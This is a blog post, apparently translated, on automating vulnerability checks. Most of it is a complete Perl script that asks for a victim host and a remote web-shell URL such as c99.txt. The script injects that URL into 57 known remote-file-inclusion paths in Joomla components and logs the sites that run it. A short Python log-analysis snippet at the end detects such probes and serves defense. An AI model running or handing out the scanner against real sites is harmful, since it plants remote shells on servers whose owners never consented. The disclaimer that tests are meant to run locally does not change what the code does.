
Vulnerability automations


Because of the hundreds of attacks against MiRuLu, we have been forced to ban, for 48-72 hours, anyone who runs their tests against the mirulu server. Tests are to be run locally, to test your own projects. The point is to learn to be more secure, not to learn to do harm.

These tools are called scripts because their programming is simple. There are two kinds, though: automations that exploit the vulnerabilities (which come closer to the term exploit), and automations that scan for certain vulnerable parameters. (Today's post focuses on the latter.)

Suppose we have a CMS with several vulnerabilities. Testing them by hand, one by one, would hardly be the best approach, so an automation is written that checks that CMS's vulnerabilities automatically.

Automations that look for vulnerable parameters are simple to program, even more so for vulnerabilities. Let's look at the example of an automation for Remote File Inclusion vulnerabilities in the Joomla CMS.

 
#!/usr/bin/perl

# RFI Joomla Comp v.1
# Code by JosS

# http://www.fullsecure.org
use HTTP::Request;
use LWP::UserAgent;

# Clear the terminal (on Windows, also set the window title and colour)
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title RFI Joomla Comp v.1 - By JosS");
system ("color 02");
}
}
lw;

print "\t\t########################################################\n\n";
print "\t\t# RFI Joomla Comp .v1 - EspSec #\n\n";
print "\t\t# by Jose #\n\n";
print "\t\t########################################################\n\n";
print "Insert host:(ex: http://www.site.com/)\n";
$host=<STDIN>;
chomp $host;
print "\n";
# If the URL does not start with http:
if ( $host !~ /^http:/ ) {
# add it
$host = 'http://' . $host;
}
# If the URL does not end with /
if ( $host !~ /\/$/ ) {
# add it
$host = $host . '/';
}
print "Insert shell:(ex: http://www.site.com/c99.txt)\n";
$shell=<STDIN>;
chomp $shell;
print "\n";
# If the URL does not start with http:
if ( $shell !~ /^http:/ ) {
# add it
$shell = 'http://' . $shell;
}
print "Insert string search:(ex: c99shell)\n";
$string=<STDIN>;
chomp $string;
print "\n\n";
print "Your config:\n\n";
print " Victim: $host \n";
print " Url Shell: $shell \n";
print " Search String: $string \n\n";
print "Scan...\n\n";
$vuln1="administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=";
$vuln2="components/com_lmo/lmo.php?mosConfig_absolute_path=";
$vuln3="components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=";
$vuln4="administrator/components/com_webring/admin.webring.docs.php?component_dir=";
$vuln5="administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=";
$vuln6="components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=";
$vuln7="components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=";
$vuln8="administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=";
$vuln9="administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=";
$vuln10="components/com_reporter/reporter.logic.php?mosConfig_absolute_path=";
$vuln11="administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=";
$vuln12="components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=";
$vuln13="components/com_joomlaboard/file_upload.php?sbp=";
$vuln14="components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=";
$vuln15="components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=";
$vuln16="components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=";
$vuln17="components/com_thopper/inc/request_type.php?mosConfig_absolute_path=";
$vuln18="components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=";
$vuln19="components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=";
$vuln20="components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=";
$vuln21="components/com_mosmedia/media.tab.php?mosConfig_absolute_path=";
$vuln22="components/com_mosmedia/media.divs.php?mosConfig_absolute_path=";
$vuln23="modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=";
$vuln24="modules/mod_as_category.php?mosConfig_absolute_path=";
$vuln25="components/com_articles.php?absolute_path=";
$vuln26="classes/html/com_articles.php?absolute_path=";
$vuln28="administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=";
$vuln29="templates/be2004-2/index.php?mosConfig_absolute_path=";
$vuln30="libraries/pcl/pcltar.php?g_pcltar_lib_dir=";
$vuln31="administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=";
$vuln32="administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=";
$vuln33="administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=";
$vuln34="components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=";
$vuln35="administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=";
$vuln36="administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=";
$vuln37="administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=";
$vuln38="administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=";
$vuln39="administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=";
$vuln40="administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=";
$vuln41="administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=";
$vuln42="administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=";
$vuln43="administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=";
$vuln44="components/com_mp3_allopass/allopass.php?mosConfig_live_site=";
$vuln45="components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=";
$vuln46="administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=";
$vuln47="administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=";
$vuln48="administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=";
$vuln49="administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=";
$vuln50="administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=";
$vuln51="administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=";
$vuln52="administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=";
$vuln53="administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=";
$vuln54="administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=";
$vuln55="administrator/components/com_color/admin.color.php?mosConfig_live_site=";
$vuln56="administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=";
$vuln57="administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=";
$vuln58="modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=";
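for ($i=1;$i<59;$i++)
{
$cont="vuln".$i;
chomp $cont;
next unless defined $$cont; # the list has no $vuln27
print "$cont\n";
# Request URL: host + component path + remote file URL
$final=$host.$$cont."$shell?";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if ($response->is_success) {
# Log the URL when the search string appears in the response body
if( $response->content =~ /$string/){
open(FILE,">>results.txt");
print FILE "$final\n";
close(FILE);
print "-------------------------------------------------\n";
print "$final\n";
print "IS VULNZ..\n";
print "-------------------------------------------------\n";
}
}
}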
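
The same scan seen from the server side, as an added example that is not part of the original post or of JosS's script: it flags access-log requests that pass a remote URL in one of the include parameters from the path list above, and groups them by client to spot an automated sweep. The log layout, the sample lines and the function names are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Parameter names that appear in the scanner's path list on this page.
RFI_PARAMS = {
    "mosConfig_absolute_path", "mosConfig_live_site", "component_dir", "sbp",
    "absolute_path", "g_pcltar_lib_dir", "GLOBALS[mosConfig_absolute_path]",
}
# Common/combined access-log layout (an assumption about the server's format).
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Constructed sample lines; addresses and host names are documentation values.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2008:13:55:36 +0000] "GET /components/com_lmo/lmo.php'
    '?mosConfig_absolute_path=http://files.example/probe.txt? HTTP/1.1" 404 209',
    '203.0.113.7 - - [10/Oct/2008:13:55:37 +0000] "GET /components/com_joomlaboard/'
    'file_upload.php?sbp=http://files.example/probe.txt? HTTP/1.1" 404 209',
    '203.0.113.7 - - [10/Oct/2008:13:55:38 +0000] "GET /libraries/pcl/pcltar.php'
    '?g_pcltar_lib_dir=http%3A%2F%2Ffiles.example%2Fprobe.txt%3F HTTP/1.1" 200 512',
    '192.0.2.9 - - [10/Oct/2008:14:01:02 +0000] "GET /components/com_lmo/lmo.php'
    '?mosConfig_absolute_path=/var/www/site HTTP/1.1" 200 100',
    '198.51.100.4 - - [10/Oct/2008:14:02:10 +0000] "GET /index.php'
    '?option=com_content&view=article&id=3 HTTP/1.1" 200 8123',
]

def find_rfi_probes(lines):
    """Map client IP -> [(path, param, value, status)] for requests that pass
    a remote URL in one of the include parameters."""
    hits = defaultdict(list)
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so "http%3A%2F%2F..." is caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name in RFI_PARAMS and REMOTE_URL_RE.match(value):
                hits[ip].append((parts.path, name, value, status))
    return dict(hits)

def scanning_sources(hits, min_distinct_paths=3):
    """Clients that probed several different paths: an automated sweep."""
    return sorted(ip for ip, rows in hits.items()
                  if len({row[0] for row in rows}) >= min_distinct_paths)
```

A flagged request answered with status 200 deserves a closer look than one answered with 404. On the PHP side, keeping allow_url_include disabled stops include() from fetching remote URLs at all.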